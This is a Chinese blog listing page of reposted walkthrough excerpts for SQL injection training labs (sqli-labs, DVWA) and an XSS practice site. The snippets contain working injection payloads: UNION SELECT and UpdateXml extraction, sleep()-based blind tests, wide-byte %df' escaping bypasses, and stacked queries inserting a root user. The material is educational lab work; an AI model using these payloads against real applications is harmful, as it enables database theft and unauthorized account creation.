ajxi63204-CSDN博客

转载【alert(1) to win】不完全攻略

alert(1) to win一个练习XSS的平台，地址：https://alf.nu/alert1Warmup给出了一段JavaScript代码function escape(s) { return '<script>console.log("'+s+'");</script>';}对s没有任何校验，payload为...

2018-05-24 18:34:00 524

转载【sqli-labs】对于less34 less36的宽字节注入的一点深入

1.AddSlashes()首先来观察一下是如何通过构造吃掉转义字符的先将less 34的网页编码换成gbk加上一些输出 echo "Before addslashes(): " . $uname1 . "<br/>"; $uname = addslashes($uname1); $passwd= addslash...

2018-02-07 13:32:00 1853

转载【DVWA】【SQL Injection(Blind)】SQL盲注 Low Medium High Impossible

1.初级篇 Low.php加单引号提交http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1'&Submit=Submit#输出用户id没有找到，加注释符正常，说明是单引号闭合http://localhost/DVWA-master/vulnerabilities/sqli...

2018-02-02 20:09:00 292

转载【DVWA】【SQL Injection】SQL注入 Low Medium High Impossible

1.初级篇 low.php先看源码，取得的参数直接放到sql语句中执行if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last...

2018-02-02 18:33:00 371

转载【sqli-labs】【jsp/tomcat】 less29 less30 less31 less32 (GET型利用HTTP参数污染的注入)

sqli-labs带了几个Java版本的web注入，在tomcat-files.zip里以Less29为例，查看源码，可以看出请求最后还是提交给了php应用，难怪less29文件夹下有一个没有任何防护的index.php（没有WAF）玩之前记得修改jsp的源码，将URL指向正确解释一下这些源码，获取id的值，利用正则匹配是否为数字若为数字，带上原参数转到index...

2018-02-01 15:51:00 222

转载【sqli-labs】 less65 GET -Challenge -Blind -130 queries allowed -Variation4 (GET型挑战盲注只允许130次查询变化4)...

双引号括号闭合http://192.168.136.128/sqli-labs-master/Less-65/?id=1")%23转载于:https://www.cnblogs.com/omnis/p/8398398.html

2018-02-01 12:23:00 114

转载【sqli-labs】 less64 GET -Challenge -Blind -130 queries allowed -Variation3 (GET型挑战盲注只允许130次查询变化3)...

双括号整型http://192.168.136.128/sqli-labs-master/Less-64/?id=1)) or ((1转载于:https://www.cnblogs.com/omnis/p/8398378.html

2018-02-01 12:16:00 99

转载【sqli-labs】 less63 GET -Challenge -Blind -130 queries allowed -Variation2 (GET型挑战盲注只允许130次查询变化2)...

引号闭合http://192.168.136.128/sqli-labs-master/Less-63/?id=1' or '1'='1剩下的和Less62一样转载于:https://www.cnblogs.com/omnis/p/8398368.html

2018-02-01 12:09:00 99

转载【sqli-labs】 less62 GET -Challenge -Blind -130 queries allowed -Variation1 (GET型挑战盲注只允许130次查询变化1)...

允许130次尝试，然后是个盲注漏洞，看来要单字符猜解了加单引号，页面异常，但报错被屏蔽了http://192.168.136.128/sqli-labs-master/Less-62/?id=1'加注释符，说明不止是用单引号闭合http://192.168.136.128/sqli-labs-master/Less-62/?id=1'%23...

2018-01-31 19:31:00 210

转载【sqli-labs】 less61 GET -Challenge -Double Query -5 queries allowed -Variation4 (GET型挑战双查询只允许5次查询 ...

http://192.168.136.128/sqli-labs-master/Less-61/?id=1'单引号双括号闭合192.168.136.128/sqli-labs-master/Less-61/?id=1')) or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23转载于:https://w...

2018-01-31 19:03:00 99

转载【sqli-labs】 less60 GET -Challenge -Double Query -5 queries allowed -Variation3 (GET型挑战双查询只允许5次查询 ...

http://192.168.136.128/sqli-labs-master/Less-60/?id=1")%23http://192.168.136.128/sqli-labs-master/Less-60/?id=0") or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23转载于:https://ww...

2018-01-31 18:59:00 90

转载【sqli-labs】 less59 GET -Challenge -Double Query -5 queries allowed -Variation2 (GET型挑战双查询只允许5次查询 ...

整型的注入http://192.168.136.128/sqli-labs-master/Less-59/?id=1 or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23转载于:https://www.cnblogs.com/omnis/p/8393874.html

2018-01-31 18:43:00 114

转载【sqli-labs】 less58 GET -Challenge -Double Query -5 queries allowed -Variation1 (GET型挑战双查询只允许5次查询 ...

单引号闭合成功，但是union select结果不对http://192.168.136.128/sqli-labs-master/Less-58/?id=0' union select 1,2,3%23id='0'是不出结果的，那数据就不是从数据库取出的http://192.168.136.128/sqli-labs-master/Less-58/?id...

2018-01-31 18:27:00 113

转载【sqli-labs】 less57 GET -Challenge -Union -14 queries allowed -Variation4 (GET型挑战联合查询只允许14次查询变化4)...

双引号闭合http://192.168.136.128/sqli-labs-master/Less-57/?id=1"%23和less56一样查数据转载于:https://www.cnblogs.com/omnis/p/8393627.html

2018-01-31 17:43:00 98

转载【sqli-labs】 less56 GET -Challenge -Union -14 queries allowed -Variation3 (GET型挑战联合查询只允许14次查询变化3)...

单引号括号闭合http://192.168.136.128/sqli-labs-master/Less-56/?id=1')%23http://192.168.136.128/sqli-labs-master/Less-56/?id=0') union select 1,2,database()%23http://192.168.136.1...

2018-01-31 17:39:00 91

转载【sqli-labs】 less55 GET -Challenge -Union -14 queries allowed -Variation1 (GET型挑战联合查询只允许14次查询变化2)...

http://192.168.136.128/sqli-labs-master/Less-55/?id=1'试了几次，整型带括号正常了http://192.168.136.128/sqli-labs-master/Less-55/?id=1)%23http://192.168.136.128/sqli-labs-master/Less-55/...

2018-01-31 17:26:00 109

转载【sqli-labs】 less54 GET -Challenge -Union -10 queries allowed -Variation1 (GET型挑战联合查询只允许10次查询变化1)...

尝试的次数只有10次http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1'单引号报错，错误信息没有显示加注释符页面恢复正常，判断为单引号闭合http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1'%23...

2018-01-31 16:56:00 151

转载【sqli-labs】 less53 GET -Blind based -Order By Clause -String -Stacked injection(GET型基于盲注的字符型Order By...

http://192.168.136.128/sqli-labs-master/Less-53/?sort=1';insert into users(id,username,password) value (15,'root','root')%23转载于:https://www.cnblogs.com/omnis/p/8392605.html

2018-01-31 15:38:00 100

转载【sqli-labs】 less52 GET -Blind based -Order By Clause -numeric -Stacked injection(GET型基于盲注的整型Order By...

出错被关闭了http://192.168.136.128/sqli-labs-master/Less-52/?sort=1'http://192.168.136.128/sqli-labs-master/Less-52/?sort=1;insert into 0users(id,username,password) value (15,'root','root...

2018-01-31 15:36:00 115

转载【sqli-labs】 less51 GET -Error based -Order By Clause -String -Stacked injection(GET型基于错误的字符型Order By...

less50的字符型版本，闭合好引号就行http://192.168.136.128/sqli-labs-master/Less-51/?sort=1';insert into users(id,username,password) value (15,'root','root')%23转载于:https://www.cnblogs.com/omnis...

2018-01-31 15:25:00 100

转载【sqli-labs】 less50 GET -Error based -Order By Clause -numeric -Stacked injection(GET型基于错误的整型Order By...

报错没有关闭，直接可以用UpdateXml函数http://192.168.136.128/sqli-labs-master/Less-50/?sort=1 and UpdateXml(1,concat(0x7e,database(),0x7e),1)用堆叠注入http://192.168.136.128/sqli-labs-master/Less-...

2018-01-31 15:22:00 91

转载【sqli-labs】 less49 GET -Error based -String -Blind -Order By Clause(GET型基于盲注的字符型Order By从句注入)...

都是order by的注入，作者连图片都懒得改了。。。注意和整型的区别，前引号用提交的引号闭合，后引号用#注释http://192.168.136.128/sqli-labs-master/Less-49/?sort=1' and sleep(0.1)%23转载于:https://www.cnblogs.com/omnis/p/8392035.ht...

2018-01-31 14:24:00 100

转载【sqli-labs】 less48 GET -Error based -Blind -Numeric -Order By Clause(GET型基于盲注的整型Order By从句注入)...

图片还是47。。。访问的的确是48这个是基于bool的盲注http://192.168.136.128/sqli-labs-master/Less-48/?sort=1 and sleep(0.1)转载于:https://www.cnblogs.com/omnis/p/8392007.html...

2018-01-31 14:19:00 156

转载【sqli-labs】 less47 GET -Error based -String -Order By Clause(GET型基于错误的字符型Order By从句注入)...

http://192.168.136.128/sqli-labs-master/Less-47/?sort=1改变sort的值，结果仍然是order by 1的结果http://192.168.136.128/sqli-labs-master/Less-47/?sort=1' and sleep(0.1)%23转载于:https://ww...

2018-01-31 14:14:00 88

转载【sqli-labs】 less46 GET -Error based -Numeric -Order By Clause(GET型基于错误的数字型Order By从句注入)...

http://192.168.136.128/sqli-labs-master/Less-46/?sort=1sort=4时出现报错说明参数是添加在order by 之后错误信息没有屏蔽，直接使用UpdateXml函数报错http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and Upda...

2018-01-31 11:58:00 165

转载【sqli-labs】 less45 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)...

和Less44一个名字测试一下，发现是')闭合的login_user=1&login_password=1') or sleep(0.1)#那就是没有错误显示的less42login_user=1&login_password=1');insert into users(id,username,password) value(15,'r...

2018-01-31 11:20:00 124

转载【sqli-labs】 less44 POST -Error based -String -Stacked Blind(POST型基于盲注的堆叠字符型注入)...

盲注漏洞，登陆失败和注入失败显示的同一个页面可以用sleep函数通过延时判断是否闭合引号成功这个方法有一点不好的地方在于，并不能去控制延时，延时的时间取决于users表中的数据数量和sleep函数的参数login_user=1&login_password=1' or sleep(0.1)#14条数据延时了1.4s但延时的出现就证明引...

2018-01-31 10:33:00 182

转载【sqli-labs】 less43 POST -Error based -String -Stacked with tiwst(POST型基于错误的堆叠变形字符型注入)...

和less42一样login_user=1&login_password=1');insert into users(id,username,password) value(15,'root','root')#转载于:https://www.cnblogs.com/omnis/p/8387505.html

2018-01-30 21:41:00 156

转载【sqli-labs】 less42 POST -Error based -String -Stacked(POST型基于错误的堆叠查询字符型注入)...

Forgot your password?New User click here?看源码，可以发现和less 24不同的一点在于password字段没有进行转义处理那就对password字段进行堆叠注入login_user=1&login_password=1';insert into users(id,username,password) v...

2018-01-30 21:06:00 127

转载【sqli-labs】 less41 GET -Blind based -Intiger -Stacked(GET型基于盲注的堆叠查询整型注入)...

整型的不用闭合引号http://192.168.136.128/sqli-labs-master/Less-41/?id=1;insert into users(id,username,password) values (15,'root','root')%23http://192.168.136.128/sqli-labs-master/Less-41/?...

2018-01-30 17:21:00 98

转载【sqli-labs】 less40 GET -Blind based -String -Stacked(GET型基于盲注的堆叠查询字符型注入)...

提交，页面正常，说明是')闭合的http://192.168.136.128/sqli-labs-master/Less-40/?id=1')%23http://192.168.136.128/sqli-labs-master/Less-40/?id=1');insert into users(id,username,password) values (15,...

2018-01-30 17:13:00 148

转载【sqli-labs】 less39 GET -Stacked Query Injection -Intiger based (GET型堆叠查询整型注入)

http://192.168.136.128/sqli-labs-master/Less-39/?id=1;insert into users(id,username,password) values (15,'root','root')%23http://192.168.136.128/sqli-labs-master/Less-39/?id=15...

2018-01-30 16:55:00 189

转载【sqli-labs】 less38 GET -Stacked Query Injection -String based (GET型堆叠查询字符型注入)...

这个直接用union select就可以http://192.168.136.128/sqli-labs-master/Less-38/?id=0' union select 1,2,3%23看一下源码，发现这关的关键并不在此mysqli_multi_query()是可以执行多条语句的来看这个语句两条select都得到了执行这个就涉及到了堆...

2018-01-30 14:18:00 168

转载【sqli-labs】 less37 POST- Bypass MYSQL_real_escape_string (POST型绕过MYSQL_real_escape_string的注入)...

POST版本的less36uname=1&passwd=1%df' or 1#转载于:https://www.cnblogs.com/omnis/p/8384536.html

2018-01-30 13:11:00 995

转载【sqli-labs】 less36 GET- Bypass MYSQL_real_escape_string (GET型绕过MYSQL_real_escape_string的注入)...

看一下mysql_real_escape_string()函数\x00　　\x1a　　注入的关键还是在于闭合引号，同样使用宽字节注入http://192.168.136.128/sqli-labs-master/Less-36/?id=0%df' union select 1,2,3%23转载于:https://www.cnblogs.co...

2018-01-30 13:08:00 270

转载【sqli-labs】 less35 GET- Bypass Add Slashes(we dont need them) Integer based (GET型绕过addslashes() 函数的整...

整型注入不用闭合引号，那就更简单了http://192.168.136.128/sqli-labs-master/Less-35/?id=0 union select 1,database(),3%23转载于:https://www.cnblogs.com/omnis/p/8384494.html...

2018-01-30 12:52:00 107

转载【sqli-labs】 less34 POST- Bypass AddSlashes (POST型绕过addslashes() 函数的宽字节注入)

还是宽字节注入，POST版本的uname=1&passwd=1%df' union select 1,2,3#提交报错列名不匹配，改一下就好了uname=1&passwd=1%df' union select 1,2#看一下源码，果然只select了两个字段转载于:https://www.cnblogs.com...

2018-01-30 12:36:00 355

转载【sqli-labs】 less33 GET- Bypass AddSlashes (GET型绕过addslashes() 函数的宽字节注入)

和less32一样，对关键字符进行了添加\关于addslashes()函数payload和less32一样http://192.168.136.128/sqli-labs-master/Less-33/?id=0%df' union select 1,2,3%23转载于:https://www.cnblogs.com/omnis/p/838...

2018-01-30 12:17:00 189

转载【sqli-labs】 less32 GET- Bypass custom filter adding slashes to dangrous chars (GET型转义了'/"字符的宽字节注入)...

转义函数，针对以下字符，这样就无法闭合引号，导致无法注入'　　-->　　\'"　　-->　　\"\　　-->　　\\但是，当MySQL的客户端字符集为gbk时，就可能发生宽字节注入，参照 http://netsecurity.51cto.com/art/201404/435074.htm%df'　　-->　　%df\'　　%df%5c'...

2018-01-29 22:01:00 103

转载【sqli-labs】 less31 GET- Blind -Impidence mismatch -Having a WAF in front of web application (GET型基于盲...

标题和less30一样http://192.168.136.128/sqli-labs-master/Less-31/login.php?id=1&id=2"")闭合的http://192.168.136.128/sqli-labs-master/Less-31/login.php?id=1&id=2")and UpdateXml(1,co...

2018-01-29 21:18:00 117

空空如也

空空如也